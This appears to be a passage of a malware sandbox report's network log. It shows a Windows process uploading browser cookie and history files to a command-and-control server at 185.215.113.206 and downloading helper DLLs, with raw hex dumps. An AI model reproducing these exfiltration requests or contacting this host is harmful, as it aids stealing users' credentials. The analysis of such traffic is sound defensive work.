                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.279721022 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.280616999 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.280630112 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.280641079 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.281544924 CET1236INData Raw: 94 67 d0 31 0c 16 0d bc 35 be 42 61 60 15 1b 16 59 3b a9 69 29 7e bf ef d7 70 08 d1 4c 43 c3 27 2c 75 1b 59 d0 db 7b 37 e4 ea 73 c8 74 de e1 40 5f 64 52 e8 10 c3 a6 ab 1e 8d 4b c0 b9 42 7f a8 06 26 66 fa 20 d9 15 9c 67 80 ea f0 c0 bc a4 30 97 c8
                                                                                                                                                                                                                                                          Data Ascii: g15Ba`Y;i)~pLC',uY{7st@_dRKB&f g02V<zuWj01t9zJw02GK@9%i$_XrThR;S9s5f?)fpa`2|r/yIANv<m D8#[\l
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.281558037 CET1236INData Raw: f7 ce 75 bf df e9 99 38 e8 c6 41 b2 2e 38 3e 40 58 3b 95 a8 e5 3f fe da aa c0 52 b3 67 da dd ec fb ed 84 6c f7 82 71 ea 97 06 d4 ca c7 36 57 40 b6 bf 4a f0 73 17 e7 ee 15 f0 36 1b 1a 86 a1 a9 e7 f9 e1 a8 d7 75 fc 1c a8 65 fa 47 b6 75 27 b1 e6 d6
                                                                                                                                                                                                                                                          Data Ascii: u8A.8>@X;?Rglq6W@Js6ueGu'RivFEAzw,[}!$,N:1biK4ma7:wKkx(9gri] )~N!%#W@zY:0Kpb4dCj)^q^3$X71
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.282597065 CET1120INData Raw: 73 f2 19 60 4c ea c5 d7 15 82 f1 3b 22 f5 58 2f 7d 33 c2 34 39 aa 8d e6 e6 47 25 c7 f3 33 96 ae 51 18 b3 da 91 23 83 52 50 b0 a4 b5 9f e8 9e 48 1c 0a 3a 4b 99 92 35 d2 da 6a 86 c4 fc 9d 37 84 2a 97 cb cb 9e 01 e5 c8 2b 81 03 0c 6a 2a 94 b7 65 54
                                                                                                                                                                                                                                                          Data Ascii: s`L;"X/}349G%3Q#RPH:K5j7*+j*eTv$gw.HkT4E#6c6hh`u+NG+G=6P"zs yG"RtG2"?>zA^82qtuJNVBHIzum6uR@Y5Yf5
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.282608986 CET1236INData Raw: c7 af 5e c8 75 38 43 8b e6 d9 bb fb 6b d8 69 19 f8 d3 b2 db bb 70 d9 bb 06 ef 43 c8 33 cc a5 65 98 86 9f b9 f3 f2 44 d0 e3 1d 24 bd f4 71 75 be 47 58 23 fb ab c0 5b a2 6f 51 db c4 d7 b5 b9 93 91 84 54 3c 8a dd 84 44 05 d7 be fc bd 28 3e 89 53 66
                                                                                                                                                                                                                                                          Data Ascii: ^u8CkipC3eD$quGX#[oQT<D(>Sfc^}dW_0Ji:9W\\#iw?oEn(#\qu\4&X5YwLD;{.iWX5|M=wQ/e[jB^R>xfU[zP$U<%Qza
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.283526897 CET1236INData Raw: b2 3b 72 b5 fd fb a6 af b8 e6 75 b7 e5 fb b6 9d d6 29 75 a9 dc c2 20 35 5a 00 72 3e f7 6c 38 b0 3b 62 75 9b dc 49 5c f6 0b fe 67 cf aa fd 4c 07 f8 7d 6e 2b 32 52 b0 9f 96 0d f0 eb d9 d8 9d 0c 44 1c f7 df bf fe 7b d5 90 cd 59 0b 43 f2 6f a8 01 b1
                                                                                                                                                                                                                                                          Data Ascii: ;ru)u 5Zr>l8;buI\gL}n+2RD{YCof)SE(m%z7%B~uB:YN+Id?c@BuBvG:brH+Dc5s?0D\9@6E:esdq
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.483226061 CET1236INData Raw: 20 44 67 c7 1c ef 4d ec 66 28 67 e5 0b e3 ec e9 ed 09 9c 52 65 a6 83 b3 eb 4a 67 47 01 6a 69 5b 99 01 91 74 cd 03 3f e9 04 6a 49 5b 95 2f ed f0 02 fc 11 cb 2f 71 ba 8f ee 9f 8b 42 e8 fb ed cf 2f 4f 22 d9 c0 4c 1e bd 31 32 ed 63 5d 0e 4d 67 e8 22
                                                                                                                                                                                                                                                          Data Ascii: DgMf(gReJgGji[t?jI[//qB/O"L12c]Mg"Oio3El7*V7ULp*_yRO&"fm{Q(dGw0"E7tr4Wc0]h?7b9{l uZ;,2B^S3:|<HX


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          6192.168.2.449765185.215.113.206805932C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.186374903 CET621OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFH
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------FIJKEHJJDAAKFHIDAKFH--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.067763090 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:41 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.157099962 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBK
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 1451
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.157207012 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34
                                                                                                                                                                                                                                                          Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.103363991 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:42 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.177515030 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KKJJEBFCGDAKFIEBAAFB
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 363
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: ------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="file"------KKJJEBFCGDAKFIEBAAFB--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.112612009 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:43 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.544400930 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBA
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 363
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file"------BGDAAEHDHIIJKECBKEBA--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.478432894 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:44 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.131369114 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636215925 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:46 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                          ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Content-Length: 685392
                                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636228085 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                          Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636241913 CET1236INData Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff
                                                                                                                                                                                                                                                          Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh|$,}uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636249065 CET1236INData Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01
                                                                                                                                                                                                                                                          Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636260986 CET1236INData Raw: 00 00 00 0f 57 c8 0f 11 8c 0e 9c 00 00 00 83 c1 20 83 c3 fe 75 a6 eb 02 31 c9 f6 c2 01 74 28 0f 10 04 0f 0f 10 4c 0e 0c 0f 57 c8 0f 10 84 0e 8c 00 00 00 0f 11 4c 0e 0c 0f 10 0c 0f 0f 57 c8 0f 11 8c 0e 8c 00 00 00 31 db 8b 55 ac 39 c2 74 6b f6 c2
                                                                                                                                                                                                                                                          Data Ascii: W u1t(LWLW1U9tkt0T0U19t<f.0L0L0LL09uM17L^_[]USWVh1
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636276007 CET620INData Raw: f0 8d 86 00 ff ff ff 3d 00 ff ff ff 77 0a 68 0e e0 ff ff e9 d0 00 00 00 8b 45 08 85 c0 0f 84 c0 00 00 00 8d 9d f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 50 e8 28 f9 07 00 83 c4 0c bf 00 01 00 00 0f 1f 80 00 00 00 00 56 ff 75 0c 53 e8 0f f9 07 00
                                                                                                                                                                                                                                                          Data Ascii: =whEhh !P(VuS)9wWuSufDT>\>=t%>>f1h
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636286974 CET1236INData Raw: 07 00 83 c4 08 5d c3 cc cc cc cc cc 55 89 e5 56 8b 75 1c 8b 45 14 39 f0 73 14 68 03 e0 ff ff e8 3b f6 07 00 83 c4 04 b8 ff ff ff ff eb 16 8b 55 0c 8b 4d 08 56 ff 75 18 50 ff 75 10 e8 0b 00 00 00 83 c4 10 5e 5d c3 cc cc cc cc cc 55 89 e5 53 57 56
                                                                                                                                                                                                                                                          Data Ascii: ]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636302948 CET1236INData Raw: f2 17 66 0f 6f 2d e0 20 08 10 66 0f fe d5 f3 0f 5b d2 66 0f 70 e1 f5 66 0f f4 ca 66 0f 70 d2 f5 66 0f f4 d4 66 0f 6f e0 66 0f fe 25 00 21 08 10 66 0f 70 c9 e8 66 0f 70 d2 e8 66 0f 62 ca 66 0f 6e 54 07 04 66 0f 60 d3 66 0f 61 d3 66 0f eb cf 66 0f
                                                                                                                                                                                                                                                          Data Ascii: fo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxEUMfEMUTFtFM
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636323929 CET1236INData Raw: 4d cc 8b 45 e8 8b 55 ec 01 d0 83 c0 03 0f b6 c0 8b 55 f0 0f b6 14 02 00 d3 0f b6 f3 8b 7d f0 8a 34 37 8b 7d f0 88 34 07 8b 45 f0 88 14 30 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 10 09 c8 8b 4d e8 8b 55 ec 01 d1 83 c1 04 0f b6 c9 8b 55 f0 0f b6
                                                                                                                                                                                                                                                          Data Ascii: MEUU}47}4E0UMUU}47}4M1uU3UMEM}}Eu;uUM}Et}E
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.636337042 CET1236INData Raw: a5 33 95 d8 fe ff ff 89 f8 31 f0 89 d6 0f a4 c6 08 0f a4 d0 08 89 85 5c ff ff ff 8b 9d 74 ff ff ff 8b 53 38 89 95 ec fe ff ff 8b 45 d0 01 d0 8b 53 3c 89 95 f0 fe ff ff 8b 5d e4 11 d3 03 85 5c ff ff ff 89 45 d0 11 f3 89 5d e4 31 d9 8b 95 64 ff ff
                                                                                                                                                                                                                                                          Data Ascii: 31\tS8ES<]\E]1d1dMM}1\1M\tH@uHD4U`uU1]d1dMMMUU1u1
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.187335014 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.912434101 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:48 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                          ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Content-Length: 608080
                                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:49.696443081 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:50.138871908 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:49 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                          ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Content-Length: 450024
                                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
